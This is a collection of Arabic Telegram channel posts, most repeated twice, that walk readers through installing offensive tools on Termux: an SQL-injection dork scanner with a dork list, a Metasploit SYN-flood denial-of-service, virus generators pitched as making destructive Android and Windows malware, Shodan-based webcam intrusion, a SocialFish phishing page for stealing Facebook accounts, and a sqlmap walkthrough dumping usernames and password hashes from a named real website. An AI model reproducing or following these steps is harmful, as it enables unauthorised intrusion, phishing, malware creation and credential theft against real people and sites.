⚶ شرح اداه (Optiva-framework)
⚶ الاداه هي عباره عن مشروع يقوم بأستخراج مواقع مصابه وتستطيع فتح لوحه التحكم عبرها يعني مشروع اختراق متكامل
لتثبيتها واستخراج مواقع تابعوا معي
⚶ تقوم بكتابه الاوامر الاتيه :
(1) pkg update
(2) pkg upgrade
(3) pkg install python
(4) pkg install python2
(5) pkg install git
(6) git clone https://github.com/joker25000/Optiva-Framework
(7) cd Optiva-framework
(8) chmod 777 installer.sh
(9) bash installer.sh
⚶ لآن فتحت سكريبت التثبيت
رح يقلك حدد نوع نظامك ويعطيك هالخيارات
1-kali linux
2-black arch
3-termux
0-exit
⚶ اذا كنت مشغل تيرموكس اكتب 3 وانتر
وانتظر لين يتثبت
بعد التثبيت راح يقلك اضغط اي زر
(Pess any key )
رح تضغط انتر
ورح يرجعك ع القائمه يلي فوق يلي تختار اي نظام رح تكتب 0 يعني خروج
⚶ بعدين اكتب هالاوامر
(1) ls
(2) chmod 777 optiva.py
(3) python2 optiva.py
هالحين مبروك فتحت الاداه
⚶ الان شرح كيف تستخرج المواقع
بعد فتح الاداه رح تكتب ها الامر
(1) dork
⚶ رح يقلك ادخل دورك البحث رح تعطيه اذا عندك واذا ماعندك اقدم لكم اشهر الدوركات الموجوده
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
ld.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
*91;quote*93;inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_oinurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
رح تختار واحد من الدوركات الي فوق وتحطو للاداه واضغط انتر رح يبحث
⚶ رح يعطيك مواقع وجوارها مكتوب باللون الاخضر هذه راح تعرف ع طول ان الموقع ماهو مصاب
(no vuln) باللون الاخضر
⚶ وراح تلاقي مع البحث مواقع مكتوب جوارها
(vuln) باللون الاحمر
هذه تعرف ان الموقع مصاب وبكذا مبروك عليك استخرجت مواقع مصابه
⚶ اذا تريد تريد تستخرج لوحه التحكم اكتب
admin
⚶ رح يقلك جيب الموقع الذي تريد لوحه التحكم تبعه اعطيه الموقع المصاب يلي استخرجته ومبروك عليك فتحت لوحه التحكم اوفيك تخترق الموقع باداه sqlmap
⚶ الاداه هي عباره عن مشروع يقوم بأستخراج مواقع مصابه وتستطيع فتح لوحه التحكم عبرها يعني مشروع اختراق متكامل
لتثبيتها واستخراج مواقع تابعوا معي
⚶ تقوم بكتابه الاوامر الاتيه :
(1) pkg update
(2) pkg upgrade
(3) pkg install python
(4) pkg install python2
(5) pkg install git
(6) git clone https://github.com/joker25000/Optiva-Framework
(7) cd Optiva-framework
(8) chmod 777 installer.sh
(9) bash installer.sh
⚶ لآن فتحت سكريبت التثبيت
رح يقلك حدد نوع نظامك ويعطيك هالخيارات
1-kali linux
2-black arch
3-termux
0-exit
⚶ اذا كنت مشغل تيرموكس اكتب 3 وانتر
وانتظر لين يتثبت
بعد التثبيت راح يقلك اضغط اي زر
(Pess any key )
رح تضغط انتر
ورح يرجعك ع القائمه يلي فوق يلي تختار اي نظام رح تكتب 0 يعني خروج
⚶ بعدين اكتب هالاوامر
(1) ls
(2) chmod 777 optiva.py
(3) python2 optiva.py
هالحين مبروك فتحت الاداه
⚶ الان شرح كيف تستخرج المواقع
بعد فتح الاداه رح تكتب ها الامر
(1) dork
⚶ رح يقلك ادخل دورك البحث رح تعطيه اذا عندك واذا ماعندك اقدم لكم اشهر الدوركات الموجوده
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
ld.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
*91;quote*93;inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_oinurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
رح تختار واحد من الدوركات الي فوق وتحطو للاداه واضغط انتر رح يبحث
⚶ رح يعطيك مواقع وجوارها مكتوب باللون الاخضر هذه راح تعرف ع طول ان الموقع ماهو مصاب
(no vuln) باللون الاخضر
⚶ وراح تلاقي مع البحث مواقع مكتوب جوارها
(vuln) باللون الاحمر
هذه تعرف ان الموقع مصاب وبكذا مبروك عليك استخرجت مواقع مصابه
⚶ اذا تريد تريد تستخرج لوحه التحكم اكتب
admin
⚶ رح يقلك جيب الموقع الذي تريد لوحه التحكم تبعه اعطيه الموقع المصاب يلي استخرجته ومبروك عليك فتحت لوحه التحكم اوفيك تخترق الموقع باداه sqlmap
GitHub
GitHub - joker25000/Optiva-Framework: Optiva-Framework 🔎 Web Application Scanner🕵️
Optiva-Framework 🔎 Web Application Scanner🕵️. Contribute to joker25000/Optiva-Framework development by creating an account on GitHub.
اوامر تثبيت اداه اختراق الشبكات
الاوامر:
1-pkg upgrade
2-pkg update
3-pkg install git
4-pkg install python2
5-git clone https://github.com/derv82/wifite.git
6-ls
7-cd wifite
8-python2 wifite.py
الاوامر:
1-pkg upgrade
2-pkg update
3-pkg install git
4-pkg install python2
5-git clone https://github.com/derv82/wifite.git
6-ls
7-cd wifite
8-python2 wifite.py
GitHub
GitHub - derv82/wifite
Contribute to derv82/wifite development by creating an account on GitHub.
⚶ شرح عبر نظام الاندرويد وعبر تطبيق termux المحاكي للكالي لينكس ⚶
《 هجوم دوس اتاك عبر نظام ميتاسبلويت 》
تابع... جيداً
قم بدخول الى نظام ميتاسبلويت عبر كتابة
msfconsole
بعدها قم بكتابة الاوامر الاتية
1- use auxiliary/dos/tcp/synflood
2- set RHOST اي بي الموقع
طريقة جلب اي بي موقع قم بفتح تيرمنال جديد وكتابة
ping example.com
طبعا بدال example.com 👆 قم بوضع رابط موقع المستهدف وسيظهر لك الاي بي ip الموقع
قم بنسخه ولصقه
set RHOST 44.54.100.33
مثال فقط بعد تكملة الخطوة هذه نبدأ الهجمة بكتابة امر
exploit
《 هجوم دوس اتاك عبر نظام ميتاسبلويت 》
تابع... جيداً
قم بدخول الى نظام ميتاسبلويت عبر كتابة
msfconsole
بعدها قم بكتابة الاوامر الاتية
1- use auxiliary/dos/tcp/synflood
2- set RHOST اي بي الموقع
طريقة جلب اي بي موقع قم بفتح تيرمنال جديد وكتابة
ping example.com
طبعا بدال example.com 👆 قم بوضع رابط موقع المستهدف وسيظهر لك الاي بي ip الموقع
قم بنسخه ولصقه
set RHOST 44.54.100.33
مثال فقط بعد تكملة الخطوة هذه نبدأ الهجمة بكتابة امر
exploit
السلام عليكم ورحمه الله وبركاته
______________________________________________________
شرح حل مشكلة عدم فتح سكربت بلغة perl
______________________________________________________
الحل سهل جدا
قم بفتح تطبيق termux
واكتب هذه الاوامر بترتيب
1_ apt update
2_ apt upgrade
3_ apt install perl
4_ apt install clang
5_ apt install make
6_ apt install openssl
7_ apt install openssl-dev
8_ apt install openssl-tool
9_ cpan install Net::SSLeay::Handle
10_ cpan LWP::UserAgent
الامر الاخير اذا تاخر معكم في الوقت
اضغطو على ctrl z لايقافه
والان لنذهب الي السكربت ونجرب تشغيله
والان سيعمل معكم ان شاء الله بدون اي مشاكل
______________________________________________________
شرح حل مشكلة عدم فتح سكربت بلغة perl
______________________________________________________
الحل سهل جدا
قم بفتح تطبيق termux
واكتب هذه الاوامر بترتيب
1_ apt update
2_ apt upgrade
3_ apt install perl
4_ apt install clang
5_ apt install make
6_ apt install openssl
7_ apt install openssl-dev
8_ apt install openssl-tool
9_ cpan install Net::SSLeay::Handle
10_ cpan LWP::UserAgent
الامر الاخير اذا تاخر معكم في الوقت
اضغطو على ctrl z لايقافه
والان لنذهب الي السكربت ونجرب تشغيله
والان سيعمل معكم ان شاء الله بدون اي مشاكل
شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
امر تثبيت الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
امر فتح الأداة
cd admin-panel-finder
امر اعطاء الصلاحيات للأداة
chmod 777 admin_panel_finder.py
امر تشغيل الأداة
python2 admin_panel_finder.py
بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به
عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع
قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
GitHub
GitHub - bdblackhat/admin-panel-finder: A Python Script to find admin panel of a site
A Python Script to find admin panel of a site. Contribute to bdblackhat/admin-panel-finder development by creating an account on GitHub.
اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من @termuxx
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
اعذروني شباب على عدم تفاعلي بالقناة لاني انشائتها من اجل ان احتفظ ببعض المعلومات لذالك انا اعتبرها قناه خاصه بس قلت الي يحب يستفيد عادي
Baker Baker:
اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من @termuxx
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
اوامر انشاء فيروسات مدمرة للأندرويد والويندوز من @termuxx
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/Hider5/Matermuxx
pip2 install -r requirements.txt
chmod 777 malicious.py
python2 malicious.py
بعدها اختار رقم الفيروس الذي تريده يوجد فيروسات للAndroid وIOS
هذه الاداة افضل من اداة vbug
الاداة بها اكثر من 60 نوع من الفيروسات
👍1
شباب الي حبب يفرفش شوي ويتسلئ يدخل يشوف النكت في هاذه نكت ومقالب مضحكه
نكت + مقاطع مضحكه
https://t.me/altheephack
نكت + مقاطع مضحكه
https://t.me/altheephack
Telegram
😂😂نكت 😂😂
أستمتع بـ الضحك معنا 😂
كل يوم نكت جديدة وحصرياً 💯
إضحك، خَلِ البَسمة تنور قلبك ❤️
كل يوم نكت جديدة وحصرياً 💯
إضحك، خَلِ البَسمة تنور قلبك ❤️
تثبيت routersploit على termux
وضيفه الاداه اختراق الشبكات والتوصل للادمن والتحكم فيها كليا 😍
$ apt update
$ apt upgrade
$ apt install python
$ apt install python2
$ git clone https://github.com/reverse-shell/routersploit.git
$ cd routersploit
$ pip2 install -r requirments-dev.txt
$ pip2 install -r requirments.txt
$ pip2 install request
$ pip2 install requests
$ python2 rsf.py
وضيفه الاداه اختراق الشبكات والتوصل للادمن والتحكم فيها كليا 😍
$ apt update
$ apt upgrade
$ apt install python
$ apt install python2
$ git clone https://github.com/reverse-shell/routersploit.git
$ cd routersploit
$ pip2 install -r requirments-dev.txt
$ pip2 install -r requirments.txt
$ pip2 install request
$ pip2 install requests
$ python2 rsf.py
GitHub
GitHub - threat9/routersploit: Exploitation Framework for Embedded Devices
Exploitation Framework for Embedded Devices. Contribute to threat9/routersploit development by creating an account on GitHub.
تثبيت ادات
أداة استيلاء تلقائية على SQL واستشعار قاعدة البيانات -
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
$ chmod +x *
تشغيل الادة
$ python2 sqlmap.py -h
أداة استيلاء تلقائية على SQL واستشعار قاعدة البيانات -
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
$ chmod +x *
تشغيل الادة
$ python2 sqlmap.py -h
GitHub
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
Automatic SQL injection and database takeover tool - sqlmapproject/sqlmap
تثبيت ادة
Harvester
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/laramies/theHarvester
$ cd theHarvester
$ chmod +x *
$ python2 theHarvester.py
Harvester
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/laramies/theHarvester
$ cd theHarvester
$ chmod +x *
$ python2 theHarvester.py
GitHub
GitHub - laramies/theHarvester: E-mails, subdomains and names Harvester - OSINT
E-mails, subdomains and names Harvester - OSINT . Contribute to laramies/theHarvester development by creating an account on GitHub.
اداه صناعه فيروسات بجميع انواعها
$termux-setup-storage
$git clone https://github.com/Hider5/Malicious
$cd Malicious
$apt-get install python2
$pip2 install -r requirements.txt
$python2 malicious.py
#T̷H̷E̷̷M̷B̷R̷A̷T̷W̷R̷
$termux-setup-storage
$git clone https://github.com/Hider5/Malicious
$cd Malicious
$apt-get install python2
$pip2 install -r requirements.txt
$python2 malicious.py
#T̷H̷E̷̷M̷B̷R̷A̷T̷W̷R̷
اداه صناعه فيروسات بجميع انواعها
$termux-setup-storage
$git clone https://github.com/Hider5/Malicious
$cd Malicious
$apt-get install python2
$pip2 install -r requirements.txt
$python2 malicious.py
@hackteep
$termux-setup-storage
$git clone https://github.com/Hider5/Malicious
$cd Malicious
$apt-get install python2
$pip2 install -r requirements.txt
$python2 malicious.py
@hackteep
اداة termux-ubuntu لتشغيل الادوات الي تحتاج روت بدون مايكون جهازك فيه روت
#الاوامر
$ apt update $$ apt upgrade
$ pkg install git
$ git clone https://github.com/Neo-Oli/termux-ubuntu.git
$ pkg install wget proot
$ mkdir -p ~/jails/ubuntu
$ cd ~/jails/ubuntu
$ wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
$ bash ubuntu.sh
الان خليه يتحمل لما يخلص حط هاذا الامر للتشغيل
$ ./start-ubuntu.s
◆ ▬▬▬▬▬ ❴✪❵ ▬▬▬▬▬ ◆
#الاوامر
$ apt update $$ apt upgrade
$ pkg install git
$ git clone https://github.com/Neo-Oli/termux-ubuntu.git
$ pkg install wget proot
$ mkdir -p ~/jails/ubuntu
$ cd ~/jails/ubuntu
$ wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
$ bash ubuntu.sh
الان خليه يتحمل لما يخلص حط هاذا الامر للتشغيل
$ ./start-ubuntu.s
◆ ▬▬▬▬▬ ❴✪❵ ▬▬▬▬▬ ◆
GitHub
GitHub - Neo-Oli/termux-ubuntu: Ubuntu chroot on termux
Ubuntu chroot on termux. Contribute to Neo-Oli/termux-ubuntu development by creating an account on GitHub.
السلام عليكم ورحمة الله
اليوم عندنا شرح اختراق كاميرات المراقبة من termux
طبعا يلي بدو يسرق الشرح بدي اكسر ايدو 👌
اولا تدخل للتيرمكس وتكتب الأوامر التالية
1- pkg install python
2- easy_install shodan
3- pip install shodan requests
بعد كتابة اول 3 اوامر تقوم بإنشاء حساب في هذا الموقع 👇
http://www.shodan.io
بعد التسجيل في الموقع سوف يقوم بإعطائك كود
الكود بهذا الشكل 👇
pusAzu0sKOrotpwxEUAwZL5Tge47TsXE
تكتب الكود الذي حصلت عليه من الموقع في تيرمكس بهذا الشكل 👇
shodan init (الكود الذي حصلت عليه من الموقع)
الأن تم تثبيت الاداة
تكتب امر البحث عن الكاميرات 👇
shodan search webcamxp
سوف يعطيك كاميرات بهذا الشكل
مثال 👇
192.276.272.287 8080
تقوم بكتابتها في المتصفح بهذا الشكل 👇
http://192.276.272.287:8080
وستفتح معك الكاميرة
اليوم عندنا شرح اختراق كاميرات المراقبة من termux
طبعا يلي بدو يسرق الشرح بدي اكسر ايدو 👌
اولا تدخل للتيرمكس وتكتب الأوامر التالية
1- pkg install python
2- easy_install shodan
3- pip install shodan requests
بعد كتابة اول 3 اوامر تقوم بإنشاء حساب في هذا الموقع 👇
http://www.shodan.io
بعد التسجيل في الموقع سوف يقوم بإعطائك كود
الكود بهذا الشكل 👇
pusAzu0sKOrotpwxEUAwZL5Tge47TsXE
تكتب الكود الذي حصلت عليه من الموقع في تيرمكس بهذا الشكل 👇
shodan init (الكود الذي حصلت عليه من الموقع)
الأن تم تثبيت الاداة
تكتب امر البحث عن الكاميرات 👇
shodan search webcamxp
سوف يعطيك كاميرات بهذا الشكل
مثال 👇
192.276.272.287 8080
تقوم بكتابتها في المتصفح بهذا الشكل 👇
http://192.276.272.287:8080
وستفتح معك الكاميرة
اداة vbug لصنع الفيروسات (termux)
السكربت
http://addfile.org/TJld2Wr1ciV
الاوامر
cp -f vbug.zip $HOME
ls
cd
ls
unzip vbug.zip
ls
cd vbug
chmod +x vbug.py
ls
python2 vbug.py
تفتح الاداة نضغط 1 بعدها e بعدها ls
cd virus
ls
cd ELITE
cp -f elite.apk / sdcard
الفايرس موجود فذاكرة الهاتف الان يمكن تعديل عليه بتطبيق apkالسكربت
السكربت
http://addfile.org/TJld2Wr1ciV
الاوامر
cp -f vbug.zip $HOME
ls
cd
ls
unzip vbug.zip
ls
cd vbug
chmod +x vbug.py
ls
python2 vbug.py
تفتح الاداة نضغط 1 بعدها e بعدها ls
cd virus
ls
cd ELITE
cp -f elite.apk / sdcard
الفايرس موجود فذاكرة الهاتف الان يمكن تعديل عليه بتطبيق apkالسكربت
اداة ارسال الرسائل النصية SMS لأي رقم في العالم من termux
pkg update
pkg upgrad
pkg install termux-api 3
pkg install both apps 2
pkg install termux-api 3
pkg install termux-api
termux-sms-send -n (رقم الهاتف مع رمز الدولة ) (الرسالة )
pkg update
pkg upgrad
pkg install termux-api 3
pkg install both apps 2
pkg install termux-api 3
pkg install termux-api
termux-sms-send -n (رقم الهاتف مع رمز الدولة ) (الرسالة )
👍2
لتثبيت SocialFish سنحتاج الى
pkg install python
pkg install php
pkg install curl
pkg install git
pkg install unzip
pkg install wget
او استعمل الامر هذا
pkg install python php curl git unzip
بعدها نحمل الاداة من الجيثب
git clone https://github.com/UndeadSec/SocialFish.git
ثم نفتح ملف الاداة
cd SocialFish
ثم نستعمل الامر
chmod +x *
بعدها
pip install -r requirements.txt
لفتح الادة نستعمل
python SocialFish.py
انتضر تحميل ngrok
بعد تحميل تفتح الاداة قم بختيار الامر y
ثم ضع بريدك لك الخيار n/y انت حر في ذالك
اختر حرف s وختر صفحة التي تريد انشائها اي موقع تواصل
اكتب رابط الفيسبوك مثال
URL: https://www.facebook.com
ستعطيك رابط مزور يشبه موقع الفيسبوك تماما قم بخداع اصدقائك او من تريد ختراق حسابه
شرح تثبيت الادة وعمل رابط مزور لموقع الفيسبوك
pkg install python
pkg install php
pkg install curl
pkg install git
pkg install unzip
pkg install wget
او استعمل الامر هذا
pkg install python php curl git unzip
بعدها نحمل الاداة من الجيثب
git clone https://github.com/UndeadSec/SocialFish.git
ثم نفتح ملف الاداة
cd SocialFish
ثم نستعمل الامر
chmod +x *
بعدها
pip install -r requirements.txt
لفتح الادة نستعمل
python SocialFish.py
انتضر تحميل ngrok
بعد تحميل تفتح الاداة قم بختيار الامر y
ثم ضع بريدك لك الخيار n/y انت حر في ذالك
اختر حرف s وختر صفحة التي تريد انشائها اي موقع تواصل
اكتب رابط الفيسبوك مثال
URL: https://www.facebook.com
ستعطيك رابط مزور يشبه موقع الفيسبوك تماما قم بخداع اصدقائك او من تريد ختراق حسابه
شرح تثبيت الادة وعمل رابط مزور لموقع الفيسبوك
GitHub
GitHub - UndeadSec/SocialFish: Phishing Tool & Information Collector
Phishing Tool & Information Collector . Contribute to UndeadSec/SocialFish development by creating an account on GitHub.
👍1
شرح اختراق مواقع بستعمال sqlmap
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python2 sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python2 sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python2 sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448